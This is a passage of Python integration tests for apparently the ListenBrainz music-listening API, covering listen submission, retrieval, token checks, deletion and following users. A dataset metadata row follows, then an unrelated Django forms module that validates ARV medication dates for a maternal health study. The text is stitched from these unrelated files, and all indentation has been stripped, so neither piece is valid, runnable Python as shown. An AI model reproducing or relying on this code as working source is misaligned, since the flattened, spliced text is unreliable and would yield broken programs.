"""If the count argument is negative, the API should raise HTTP 400"""
url = url_for('api_v1.get_listens',
user_name=self.user['musicbrainz_id'])
response = self.client.get(url, query_string={'count': '-1'})
self.assert400(response)
def test_get_listens_ts_order(self):
"""If min_ts is greater than max_ts, the API should raise HTTP 400"""
url = url_for('api_v1.get_listens',
user_name=self.user['musicbrainz_id'])
response = self.client.get(
url, query_string={'max_ts': '1400000000', 'min_ts': '1500000000'})
self.assert400(response)
def test_get_listens(self):
""" Test to make sure that the api sends valid listens on get requests.
"""
with open(self.path_to_data_file('valid_single.json'), 'r') as f:
payload = json.load(f)
# send a listen
ts = int(time.time())
payload['payload'][0]['listened_at'] = ts
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
url = url_for('api_v1.get_listens',
user_name=self.user['musicbrainz_id'])
response = self.wait_for_query_to_have_items(
url, 1, query_string={'count': '1'})
data = json.loads(response.data)['payload']
self.assert200(response)
# make sure user id is correct
self.assertEqual(data['user_id'], self.user['musicbrainz_id'])
# make sure that count is 1 and list also contains 1 listen
self.assertEqual(data['count'], 1)
self.assertEqual(len(data['listens']), 1)
# make sure timestamp is the same as sent
sent_time = payload['payload'][0]['listened_at']
self.assertEqual(data['listens'][0]['listened_at'], sent_time)
self.assertEqual(data['listens'][0]
['track_metadata']['track_name'], 'Fade')
self.assertEqual(data['listens'][0]['track_metadata']
['artist_name'], 'Kanye West')
self.assertEqual(data['listens'][0]['track_metadata']
['release_name'], 'The Life of Pablo')
self.assertEqual(data['listens'][0]['track_metadata']
['additional_info']['listening_from'], 'spotify')
# make sure that artist msid, release msid and recording msid are present in data
self.assertTrue(is_valid_uuid(data['listens'][0]['recording_msid']))
self.assertTrue(is_valid_uuid(
data['listens'][0]['track_metadata']['additional_info']['artist_msid']))
self.assertTrue(is_valid_uuid(
data['listens'][0]['track_metadata']['additional_info']['release_msid']))
# check for latest listen timestamp
self.assertEqual(data['latest_listen_ts'], ts)
# request with min_ts should work
response = self.client.get(
url, query_string={'min_ts': int(time.time())})
self.assert200(response)
# request with max_ts lesser than the timestamp of the submitted listen
# should not send back any listens, should report a good latest_listen timestamp
response = self.client.get(url, query_string={'max_ts': ts - 2})
self.assert200(response)
self.assertListEqual(response.json['payload']['listens'], [])
self.assertEqual(response.json['payload']['latest_listen_ts'], ts)
# test request with both max_ts and min_ts is working
url = url_for('api_v1.get_listens',
user_name=self.user['musicbrainz_id'])
response = self.client.get(
url, query_string={'max_ts': ts + 1000, 'min_ts': ts - 1000})
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data['user_id'], self.user['musicbrainz_id'])
self.assertEqual(data['count'], 1)
self.assertEqual(len(data['listens']), 1)
sent_time = payload['payload'][0]['listened_at']
self.assertEqual(data['listens'][0]['listened_at'], sent_time)
self.assertEqual(data['listens'][0]
['track_metadata']['track_name'], 'Fade')
self.assertEqual(data['listens'][0]['track_metadata']
['artist_name'], 'Kanye West')
self.assertEqual(data['listens'][0]['track_metadata']
['release_name'], 'The Life of Pablo')
# check that recent listens are fetched correctly
url = url_for('api_v1.get_recent_listens_for_user_list',
user_list=self.user['musicbrainz_id'])
response = self.client.get(url, query_string={'limit': '1'})
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data['count'], 1)
url = url_for('api_v1.get_listen_count',
user_name=self.user['musicbrainz_id'])
response = self.client.get(url)
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data['count'], 1)
url = url_for('api_v1.get_listen_count', user_name="sir_dumpsterfire")
response = self.client.get(url)
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data['count'], 0)
def test_get_listens_with_time_range(self):
""" Test to make sure that the api sends valid listens on get requests.
"""
with open(self.path_to_data_file('valid_single.json'), 'r') as f:
payload = json.load(f)
# send three listens
user = db_user.get_or_create(1, 'test_time_range')
ts = 1400000000
for i in range(3):
payload['payload'][0]['listened_at'] = ts + (100 * i)
response = self.send_data(payload, user)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
old_ts = ts - 2592000 # 30 days
payload['payload'][0]['listened_at'] = old_ts
response = self.send_data(payload, user)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
expected_count = 3
url = url_for('api_v1.get_listens', user_name=user['musicbrainz_id'])
response = self.wait_for_query_to_have_items(url, expected_count)
data = json.loads(response.data)['payload']
self.assert200(response)
self.assertEqual(data['count'], expected_count)
self.assertEqual(data['listens'][0]['listened_at'], 1400000200)
self.assertEqual(data['listens'][1]['listened_at'], 1400000100)
self.assertEqual(data['listens'][2]['listened_at'], 1400000000)
url = url_for('api_v1.get_listens', user_name=user['musicbrainz_id'])
response = self.client.get(url, query_string={'time_range': 10})
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data['count'], 4)
self.assertEqual(data['listens'][0]['listened_at'], 1400000200)
self.assertEqual(data['listens'][1]['listened_at'], 1400000100)
self.assertEqual(data['listens'][2]['listened_at'], 1400000000)
self.assertEqual(data['listens'][3]['listened_at'], old_ts)
# Check time_range ranges
url = url_for('api_v1.get_listens', user_name=user['musicbrainz_id'])
response = self.client.get(url, query_string={'time_range': 0})
self.assert400(response)
url = url_for('api_v1.get_listens', user_name=user['musicbrainz_id'])
response = self.client.get(url, query_string={'time_range': 74})
self.assert400(response)
def test_get_listens_order(self):
""" Test to make sure that the api sends listens in valid order.
"""
with open(self.path_to_data_file('valid_single.json'), 'r') as f:
payload = json.load(f)
# send three listens
ts = 1400000000
user = db_user.get_or_create(1, 'test_order')
for i in range(3):
payload['payload'][0]['listened_at'] = ts + (100 * i)
response = self.send_data(payload, user)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
expected_count = 3
url = url_for('api_v1.get_listens', user_name=user['musicbrainz_id'])
response = self.wait_for_query_to_have_items(url, expected_count)
data = json.loads(response.data)['payload']
self.assert200(response)
self.assertEqual(data['count'], expected_count)
self.assertEqual(data['listens'][0]['listened_at'], 1400000200)
self.assertEqual(data['listens'][1]['listened_at'], 1400000100)
self.assertEqual(data['listens'][2]['listened_at'], 1400000000)
# Fetch the listens with from_ts and make sure the order is descending
url = url_for('api_v1.get_listens',
user_name=self.user['musicbrainz_id'])
response = self.client.get(
url, query_string={'count': '3', 'from_ts': ts-500})
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data['count'], expected_count)
self.assertEqual(data['listens'][0]['listened_at'], 1400000200)
self.assertEqual(data['listens'][1]['listened_at'], 1400000100)
self.assertEqual(data['listens'][2]['listened_at'], 1400000000)
def test_zero_listens_payload(self):
""" Test that API returns 400 for payloads with no listens
"""
for listen_type in ('single', 'playing_now', 'import'):
payload = {
'listen_type': listen_type,
'payload': [],
}
response = self.send_data(payload)
self.assert400(response)
def test_unauthorized_submission(self):
""" Test for checking that unauthorized submissions return 401
"""
with open(self.path_to_data_file('valid_single.json'), 'r') as f:
payload = json.load(f)
# request with no authorization header
response = self.client.post(
url_for('api_v1.submit_listen'),
data=json.dumps(payload),
content_type='application/json'
)
self.assert401(response)
self.assertEqual(response.json['code'], 401)
# request with invalid authorization header
response = self.client.post(
url_for('api_v1.submit_listen'),
data=json.dumps(payload),
headers={'Authorization': 'Token testtokenplsignore'},
content_type='application/json'
)
self.assert401(response)
self.assertEqual(response.json['code'], 401)
def test_valid_single(self):
""" Test for valid submissioon of listen_type listen
"""
with open(self.path_to_data_file('valid_single.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
def test_single_more_than_one_listen(self):
""" Test for an invalid submission which has listen_type 'single' but
more than one listen in payload
"""
with open(self.path_to_data_file('single_more_than_one_listen.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_valid_playing_now(self):
""" Test for valid submission of listen_type 'playing_now'
"""
with open(self.path_to_data_file('valid_playing_now.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
r = self.client.get(url_for('api_v1.get_playing_now',
user_name=self.user['musicbrainz_id']))
self.assert200(r)
self.assertEqual(r.json['payload']['count'], 1)
def test_playing_now_with_duration(self):
""" Test that playing now listens with durations expire
"""
with open(self.path_to_data_file('playing_now_with_duration.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
r = self.client.get(url_for('api_v1.get_playing_now',
user_name=self.user['musicbrainz_id']))
self.assertEqual(r.json['payload']['count'], 1)
self.assertEqual(r.json['payload']['listens'][0]
['track_metadata']['track_name'], 'Fade')
time.sleep(1.1)
# should have expired by now
r = self.client.get(url_for('api_v1.get_playing_now',
user_name=self.user['musicbrainz_id']))
self.assertEqual(r.json['payload']['count'], 0)
def test_playing_now_with_duration_ms(self):
""" Test that playing now submissions with duration_ms also expire
"""
with open(self.path_to_data_file('playing_now_with_duration_ms.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
r = self.client.get(url_for('api_v1.get_playing_now',
user_name=self.user['musicbrainz_id']))
self.assertEqual(r.json['payload']['count'], 1)
self.assertEqual(r.json['payload']['listens'][0]
['track_metadata']['track_name'], 'Fade')
time.sleep(1.1)
# should have expired by now
r = self.client.get(url_for('api_v1.get_playing_now',
user_name=self.user['musicbrainz_id']))
self.assertEqual(r.json['payload']['count'], 0)
def test_playing_now_with_ts(self):
""" Test for invalid submission of listen_type 'playing_now' which contains
timestamp 'listened_at'
"""
with open(self.path_to_data_file('playing_now_with_ts.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_playing_now_more_than_one_listen(self):
""" Test for invalid submission of listen_type 'playing_now' which contains
more than one listen in payload
"""
with open(self.path_to_data_file('playing_now_more_than_one_listen.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_valid_import(self):
""" Test for a valid submission of listen_type 'import'
"""
with open(self.path_to_data_file('valid_import.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
def test_too_large_listen(self):
""" Test for invalid submission in which the overall size of the listens sent is more than
10240 bytes
"""
with open(self.path_to_data_file('too_large_listen.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_too_many_tags_in_listen(self):
""" Test for invalid submission in which a listen contains more than the allowed
number of tags in additional_info.
"""
with open(self.path_to_data_file('too_many_tags.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_too_long_tag(self):
""" Test for invalid submission in which a listen contains a tag of length > 64
"""
with open(self.path_to_data_file('too_long_tag.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_invalid_release_mbid(self):
""" Test for invalid submission in which a listen contains an invalid release_mbid
in additional_info
"""
with open(self.path_to_data_file('invalid_release_mbid.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_invalid_artist_mbid(self):
""" Test for invalid submission in which a listen contains an invalid artist_mbid
in additional_info
"""
with open(self.path_to_data_file('invalid_artist_mbid.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_invalid_recording_mbid(self):
""" Test for invalid submission in which a listen contains an invalid recording_mbid
in additional_info
"""
with open(self.path_to_data_file('invalid_recording_mbid.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_additional_info(self):
""" Test to make sure that user generated data present in additional_info field
of listens is preserved
"""
with open(self.path_to_data_file('additional_info.json'), 'r') as f:
payload = json.load(f)
payload['payload'][0]['listened_at'] = 1280258690
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
expected_length = 1
url = url_for('api_v1.get_listens',
user_name=self.user['musicbrainz_id'])
response = self.wait_for_query_to_have_items(
url, expected_length, query_string={'count': '1'})
data = json.loads(response.data)['payload']
self.assert200(response)
self.assertEqual(len(data['listens']), expected_length)
sent_additional_info = payload['payload'][0]['track_metadata']['additional_info']
received_additional_info = data['listens'][0]['track_metadata']['additional_info']
self.assertEqual(
sent_additional_info['best_song'], received_additional_info['best_song'])
self.assertEqual(
sent_additional_info['link1'], received_additional_info['link1'])
self.assertEqual(
sent_additional_info['link2'], received_additional_info['link2'])
self.assertEqual(
sent_additional_info['other_stuff'], received_additional_info['other_stuff'])
self.assertEqual(
sent_additional_info['nested']['info'], received_additional_info['nested.info'])
self.assertListEqual(
sent_additional_info['release_type'], received_additional_info['release_type'])
self.assertEqual(
sent_additional_info['spotify_id'], received_additional_info['spotify_id'])
self.assertEqual(
sent_additional_info['isrc'], received_additional_info['isrc'])
self.assertEqual(
sent_additional_info['tracknumber'], received_additional_info['tracknumber'])
self.assertEqual(
sent_additional_info['release_group_mbid'], received_additional_info['release_group_mbid'])
self.assertListEqual(
sent_additional_info['work_mbids'], received_additional_info['work_mbids'])
self.assertListEqual(
sent_additional_info['artist_mbids'], received_additional_info['artist_mbids'])
self.assertListEqual(
sent_additional_info['non_official_list'], received_additional_info['non_official_list'])
self.assertNotIn('track_name', sent_additional_info)
self.assertNotIn('artist_name', sent_additional_info)
self.assertNotIn('release_name', sent_additional_info)
def test_000_similar_users(self):
response = self.client.get(
url_for('api_v1.get_similar_users', user_name='my_dear_muppet'))
self.assert404(response)
conn = db.engine.raw_connection()
with conn.cursor() as curs:
data = {self.user2['musicbrainz_id']: .123}
curs.execute("""INSERT INTO recommendation.similar_user VALUES (%s, %s)""",
(self.user['id'], json.dumps(data)))
conn.commit()
response = self.client.get(
url_for('api_v1.get_similar_users', user_name=self.user['musicbrainz_id']))
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data[0]['user_name'], self.user2['musicbrainz_id'])
self.assertEqual(data[0]['similarity'], .123)
response = self.client.get(url_for(
'api_v1.get_similar_to_user', user_name=self.user['musicbrainz_id'], other_user_name="muppet"))
self.assert404(response)
response = self.client.get(url_for(
'api_v1.get_similar_to_user', user_name=self.user['musicbrainz_id'], other_user_name=self.user2['musicbrainz_id']))
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data['user_name'], self.user2['musicbrainz_id'])
self.assertEqual(data['similarity'], .123)
def test_latest_import(self):
""" Test for api.latest_import """
# initially the value of latest_import will be 0
response = self.client.get(url_for('api_v1.latest_import'), query_string={
'user_name': self.user['musicbrainz_id']})
self.assert200(response)
data = json.loads(response.data)
self.assertEqual(data['musicbrainz_id'], self.user['musicbrainz_id'])
self.assertEqual(data['latest_import'], 0)
# now an update
val = int(time.time())
response = self.client.post(
url_for('api_v1.latest_import'),
data=json.dumps({'ts': val}),
headers={'Authorization': 'Token {token}'.format(
token=self.user['auth_token'])}
)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
# now the value must have changed
response = self.client.get(url_for('api_v1.latest_import'), query_string={
'user_name': self.user['musicbrainz_id']})
self.assert200(response)
data = json.loads(response.data)
self.assertEqual(data['musicbrainz_id'], self.user['musicbrainz_id'])
self.assertEqual(data['latest_import'], val)
def test_latest_import_unauthorized(self):
""" Test for invalid tokens passed to user.latest_import view"""
val = int(time.time())
response = self.client.post(
url_for('api_v1.latest_import'),
data=json.dumps({'ts': val}),
headers={'Authorization': 'Token thisisinvalid'}
)
self.assert401(response)
self.assertEqual(response.json['code'], 401)
def test_latest_import_unknown_user(self):
"""Tests api.latest_import without a valid username"""
response = self.client.get(
url_for('api_v1.latest_import'), query_string={'user_name': ''})
self.assert404(response)
self.assertEqual(response.json['code'], 404)
def test_multiple_artist_names(self):
""" Tests multiple artist names in artist_name field of data """
with open(self.path_to_data_file('artist_name_list.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
self.assertEqual('artist_name must be a single string.',
response.json['error'])
def test_too_high_timestamps(self):
""" Tests for timestamps greater than current time """
with open(self.path_to_data_file('timestamp_in_ns.json'), 'r') as f:
payload = json.load(f)
payload['listened_at'] = int(time.time()) * 10**9
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
self.assertEqual(
'Value for key listened_at is too high.', response.json['error'])
def test_invalid_token_validation(self):
"""Sends an invalid token to api.validate_token"""
url = url_for('api_v1.validate_token')
response = self.client.get(url, query_string={"token": "invalidtoken"})
self.assert200(response)
self.assertEqual(response.json['code'], 200)
self.assertEqual('Token invalid.', response.json['message'])
self.assertFalse(response.json['valid'])
self.assertNotIn('user_name', response.json)
def test_valid_token_validation(self):
"""Sends a valid token to api.validate_token"""
url = url_for('api_v1.validate_token')
response = self.client.get(
url, query_string={"token": self.user['auth_token']})
self.assert200(response)
self.assertEqual(response.json['code'], 200)
self.assertEqual('Token valid.', response.json['message'])
self.assertTrue(response.json['valid'])
self.assertEqual(response.json['user_name'],
self.user['musicbrainz_id'])
def test_token_validation_auth_header(self):
"""Sends a valid token to api.validate_token in the Authorization header"""
url = url_for('api_v1.validate_token')
response = self.client.get(url, headers={
"Authorization": "Token {}".format(self.user['auth_token'])
})
self.assert200(response)
self.assertEqual(response.json['code'], 200)
self.assertEqual('Token valid.', response.json['message'])
self.assertTrue(response.json['valid'])
self.assertEqual(response.json['user_name'], self.user['musicbrainz_id'])
def test_get_playing_now(self):
""" Test for valid submission and retrieval of listen_type 'playing_now'
"""
r = self.client.get(url_for('api_v1.get_playing_now',
user_name='thisuserdoesnotexist'))
self.assert404(r)
r = self.client.get(url_for('api_v1.get_playing_now',
user_name=self.user['musicbrainz_id']))
self.assertEqual(r.json['payload']['count'], 0)
self.assertEqual(len(r.json['payload']['listens']), 0)
with open(self.path_to_data_file('valid_playing_now.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
r = self.client.get(url_for('api_v1.get_playing_now',
user_name=self.user['musicbrainz_id']))
self.assertTrue(r.json['payload']['playing_now'])
self.assertEqual(r.json['payload']['count'], 1)
self.assertEqual(len(r.json['payload']['listens']), 1)
self.assertEqual(r.json['payload']['user_id'],
self.user['musicbrainz_id'])
self.assertEqual(r.json['payload']['listens'][0]
['track_metadata']['artist_name'], 'Kanye West')
self.assertEqual(r.json['payload']['listens'][0]
['track_metadata']['release_name'], 'The Life of Pablo')
self.assertEqual(r.json['payload']['listens'][0]
['track_metadata']['track_name'], 'Fade')
@pytest.mark.skip(reason="Test seems to fail when running all integration tests, but passes when run individually. "
"Skip for now")
def test_delete_listen(self):
with open(self.path_to_data_file('valid_single.json'), 'r') as f:
payload = json.load(f)
# send a listen
ts = int(time.time())
payload['payload'][0]['listened_at'] = ts
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
url = url_for('api_v1.get_listens',
user_name=self.user['musicbrainz_id'])
response = self.wait_for_query_to_have_items(url, 1)
data = json.loads(response.data)['payload']
self.assertEqual(len(data['listens']), 1)
delete_listen_url = url_for('api_v1.delete_listen')
data = {
"listened_at": ts,
"recording_msid": payload['payload'][0]['track_metadata']['additional_info']['recording_msid']
}
response = self.client.post(
delete_listen_url,
data=json.dumps(data),
headers={'Authorization': 'Token {}'.format(
self.user['auth_token'])},
content_type='application/json'
)
self.assert200(response)
self.assertEqual(response.json["status"], "ok")
def test_delete_listen_not_logged_in(self):
delete_listen_url = url_for('api_v1.delete_listen')
data = {
"listened_at": 1486449409,
"recording_msid": "2cfad207-3f55-4aec-8120-86cf66e34d59"
}
# send a request without auth_token
response = self.client.post(
delete_listen_url,
data=json.dumps(data),
content_type='application/json'
)
self.assert401(response)
# send a request with invalid auth_token
response = self.client.post(
delete_listen_url,
data=json.dumps(data),
headers={'Authorization': 'Token {}'.format(
"invalidtokenpleaseignore")},
content_type='application/json'
)
self.assert401(response)
def test_delete_listen_missing_keys(self):
delete_listen_url = url_for('api_v1.delete_listen')
# send request without listened_at
data = {
"recording_msid": "2cfad207-3f55-4aec-8120-86cf66e34d59"
}
response = self.client.post(
delete_listen_url,
data=json.dumps(data),
headers={'Authorization': 'Token {}'.format(
self.user['auth_token'])},
content_type='application/json'
)
self.assertStatus(response, 400)
self.assertEqual(response.json["error"], "Listen timestamp missing.")
# send request without recording_msid
data = {
"listened_at": 1486449409
}
response = self.client.post(
delete_listen_url,
data=json.dumps(data),
headers={'Authorization': 'Token {}'.format(
self.user['auth_token'])},
content_type='application/json'
)
self.assertStatus(response, 400)
self.assertEqual(response.json["error"], "Recording MSID missing.")
def test_delete_listen_invalid_keys(self):
delete_listen_url = url_for('api_v1.delete_listen')
# send request with invalid listened_at
data = {
"listened_at": "invalid listened_at",
"recording_msid": "2cfad207-3f55-4aec-8120-86cf66e34d59"
}
response = self.client.post(
delete_listen_url,
data=json.dumps(data),
headers={'Authorization': 'Token {}'.format(
self.user['auth_token'])},
content_type='application/json'
)
self.assertStatus(response, 400)
self.assertEqual(
response.json["error"], "invalid listened_at: Listen timestamp invalid.")
# send request with invalid recording_msid
data = {
"listened_at": 1486449409,
"recording_msid": "invalid recording_msid"
}
response = self.client.post(
delete_listen_url,
data=json.dumps(data),
headers={'Authorization': 'Token {}'.format(
self.user['auth_token'])},
content_type='application/json'
)
self.assertEqual(
response.json["error"], "invalid recording_msid: Recording MSID format invalid.")
def test_followers_returns_the_followers_of_a_user(self):
r = self.client.post(self.follow_user_url, headers=self.follow_user_headers)
self.assert200(r)
r = self.client.get(url_for("social_api_v1.get_followers", user_name=self.followed_user["musicbrainz_id"]))
self.assert200(r)
self.assertListEqual([self.user.musicbrainz_id], r.json['followers'])
def test_following_returns_the_people_who_follow_the_user(self):
r = self.client.post(self.follow_user_url, headers=self.follow_user_headers)
self.assert200(r)
r = self.client.get(url_for("social_api_v1.get_following", user_name=self.user["musicbrainz_id"]))
self.assert200(r)
self.assertListEqual(['followed_user'], r.json['following'])
def test_follow_user(self):
r = self.client.post(self.follow_user_url, headers=self.follow_user_headers)
self.assert200(r)
self.assertTrue(db_user_relationship.is_following_user(self.user.id, self.followed_user['id']))
def test_follow_user_requires_login(self):
r = self.client.post(self.follow_user_url)
self.assert401(r)
def test_following_a_nonexistent_user_errors_out(self):
r = self.client.post(url_for("social_api_v1.follow_user", user_name="user_doesnt_exist_lol"),
headers=self.follow_user_headers)
self.assert404(r)
def test_following_yourself_errors_out(self):
r = self.client.post(url_for("social_api_v1.follow_user", user_name=self.user.musicbrainz_id),
headers=self.follow_user_headers)
self.assert400(r)
def test_follow_user_twice_leads_to_error(self):
r = self.client.post(self.follow_user_url, headers=self.follow_user_headers)
self.assert200(r)
self.assertTrue(db_user_relationship.is_following_user(self.user.id, self.followed_user['id']))
# now, try to follow again, this time expecting a 400
r = self.client.post(self.follow_user_url, headers=self.follow_user_headers)
self.assert400(r)
def test_unfollow_user(self):
# first, follow the user
r = self.client.post(self.follow_user_url, headers=self.follow_user_headers)
self.assert200(r)
self.assertTrue(db_user_relationship.is_following_user(self.user.id, self.followed_user['id']))
# now, unfollow and check the db
r = self.client.post(url_for("social_api_v1.unfollow_user", user_name=self.followed_user["musicbrainz_id"]),
headers=self.follow_user_headers)
self.assert200(r)
self.assertFalse(db_user_relationship.is_following_user(self.user.id, self.followed_user['id']))
def test_unfollow_not_following_user(self):
r = self.client.post(url_for("social_api_v1.unfollow_user", user_name=self.followed_user["musicbrainz_id"]),
headers=self.follow_user_headers)
self.assert200(r)
self.assertFalse(db_user_relationship.is_following_user(self.user.id, self.followed_user['id']))
def test_unfollow_user_requires_login(self):
r = self.client.post(url_for("social_api_v1.unfollow_user", user_name=self.followed_user["musicbrainz_id"]))
self.assert401(r)
| gpl-2.0 | 7,448,170,422,559,113,000 | 42.321596 | 127 | 0.599512 | false |
botswana-harvard/tshilo-dikotla | td_maternal/forms/maternal_arv_preg_form.py | 1 | 8440 | from edc_appointment.models import Appointment
from edc_constants.constants import YES, NO, NOT_APPLICABLE
from django import forms
from django.apps import apps as django_apps
from ..models import (MaternalArvPreg, MaternalArv, MaternalLifetimeArvHistory)
from .base_maternal_model_form import BaseMaternalModelForm
def get_previous_visit(visit_obj, timepoints, subject_identifier):
position = timepoints.index(
visit_obj.appointment.visit_definition.code)
timepoints_slice = timepoints[:position]
visit_model = django_apps.get_model(visit_obj._meta.label_lower)
if len(timepoints_slice) > 1:
timepoints_slice.reverse()
for point in timepoints_slice:
try:
previous_appointment = Appointment.objects.filter(
registered_subject__subject_identifier=subject_identifier, visit_definition__code=point).order_by('-created').first()
return visit_model.objects.filter(appointment=previous_appointment).order_by('-created').first()
except Appointment.DoesNotExist:
pass
except visit_model.DoesNotExist:
pass
except AttributeError:
pass
return None
class MaternalArvPregForm(BaseMaternalModelForm):
def clean(self):
cleaned_data = super(MaternalArvPregForm, self).clean()
self.validate_interrupted_medication()
self.validate_took_yes()
return cleaned_data
def validate_interrupted_medication(self):
cleaned_data = self.cleaned_data
if (cleaned_data.get('is_interrupt') == YES and
cleaned_data.get('interrupt') == NOT_APPLICABLE):
raise forms.ValidationError('You indicated that ARVs were interrupted during pregnancy. '
'Please provide a reason for interruption')
if (cleaned_data.get('is_interrupt') == NO and
cleaned_data.get('interrupt') != NOT_APPLICABLE):
raise forms.ValidationError('You indicated that ARVs were NOT interrupted during '
'pregnancy. You cannot provide a reason. Please correct.')
def validate_took_yes(self):
cleaned_data = self.cleaned_data
maternal_arv = self.data.get(
'maternalarv_set-0-arv_code')
if cleaned_data.get('took_arv') == YES:
if not maternal_arv:
raise forms.ValidationError(
{'took_arv': 'Please complete the maternal arv table.'})
# def validate_arv_exposed(self):
# cleaned_data = self.cleaned_data
# if cleaned_data.get('took_arv') == NO:
# registered_subject = cleaned_data.get('maternal_visit').appointment.registered_subject
# try:
# antental = AntenatalEnrollment.objects.get(registered_subject=registered_subject)
# if antental.valid_regimen_duration == YES:
# raise forms.ValidationError(
# "At ANT you indicated that the participant has been on regimen "
# "for period of time. But now you indicated that the participant did not "
# "take ARVs. Please Correct.")
# except AntenatalEnrollment.DoesNotExist:
# pass
# try:
# postnatal = PostnatalEnrollment.objects.get(registered_subject=registered_subject)
# if postnatal.valid_regimen_duration == YES:
# raise forms.ValidationError(
# "At PNT you indicated that the participant has been on regimen "
# "for period of time. But now you indicated that the participant did not "
# "take ARVs. Please Correct.")
# except PostnatalEnrollment.DoesNotExist:
# pass
class Meta:
model = MaternalArvPreg
fields = '__all__'
class MaternalArvForm(BaseMaternalModelForm):
def clean(self):
cleaned_data = super(MaternalArvForm, self).clean()
self.validate_start_stop_date()
self.validate_took_arv()
self.validate_historical_and_present_arv_start_dates()
self.validate_previous_maternal_arv_preg_arv_start_dates()
self.validate_stop_date_reason_for_stop()
return cleaned_data
def validate_start_stop_date(self):
cleaned_data = self.cleaned_data
if cleaned_data.get('stop_date'):
if cleaned_data.get('stop_date') < cleaned_data.get('start_date'):
raise forms.ValidationError(
'Your stop date of {} is prior to start date of {}. '
'Please correct'.format(
cleaned_data.get('stop_date'), cleaned_data.get('start_date')))
def validate_took_arv(self):
cleaned_data = self.cleaned_data
took_arv = cleaned_data.get('maternal_arv_preg').took_arv
if took_arv == YES:
if not cleaned_data.get('arv_code'):
raise forms.ValidationError(
"You indicated that participant started ARV(s) during this "
"pregnancy. Please list them on 'Maternal ARV' table")
else:
if cleaned_data.get('arv_code'):
raise forms.ValidationError(
"You indicated that ARV(s) were NOT started during this pregnancy. "
"You cannot provide a list. Please Correct.")
def validate_historical_and_present_arv_start_dates(self):
"""Confirms that the ARV start date is not less than the Historical ARV start date"""
cleaned_data = self.cleaned_data
try:
maternal_visit = cleaned_data.get(
'maternal_arv_preg').maternal_visit
arv_history = MaternalLifetimeArvHistory.objects.get(
maternal_visit=maternal_visit)
if arv_history.haart_start_date:
start_date = cleaned_data.get('start_date')
if start_date < arv_history.haart_start_date:
raise forms.ValidationError(
"Your ARV start date {} in this pregnancy cannot be before your "
"Historical ARV date {}".format(
start_date, arv_history.haart_start_date))
except MaternalLifetimeArvHistory.DoesNotExist:
pass
def validate_previous_maternal_arv_preg_arv_start_dates(self):
"""Confirms that the ARV start date is equal to Maternal ARV
start date unless stopped.
"""
cleaned_data = self.cleaned_data
subject_identifier = cleaned_data.get(
'maternal_arv_preg').maternal_visit.appointment.registered_subject.subject_identifier
previous_visit = get_previous_visit(
visit_obj=cleaned_data.get('maternal_arv_preg').maternal_visit,
timepoints=['1000M', '1020M', '2000M'],
subject_identifier=subject_identifier)
if previous_visit:
previous_arv_preg = MaternalArv.objects.filter(
maternal_arv_preg__maternal_visit__appointment__registered_subject__subject_identifier=subject_identifier,
stop_date__isnull=True).order_by('start_date').first()
if previous_arv_preg:
if previous_arv_preg.start_date:
start_date = cleaned_data.get('start_date')
if start_date < previous_arv_preg.start_date:
raise forms.ValidationError(
"New start date cannot be before initial ARV start date, "
"initial date: {}, new start date: {}.".format(
previous_arv_preg.start_date, start_date))
def validate_stop_date_reason_for_stop(self):
cleaned_data = self.cleaned_data
if cleaned_data.get('stop_date'):
if not cleaned_data.get('reason_for_stop'):
raise forms.ValidationError(
{'reason_for_stop': 'ARV stopped, please give reason for stop.'})
else:
if not cleaned_data.get('stop_date'):
if cleaned_data.get('reason_for_stop'):
raise forms.ValidationError(
{'reason_for_stop': 'ARV not stopped, do not give reason for stop.'})
class Meta:
model = MaternalArv
fields = '__all__'
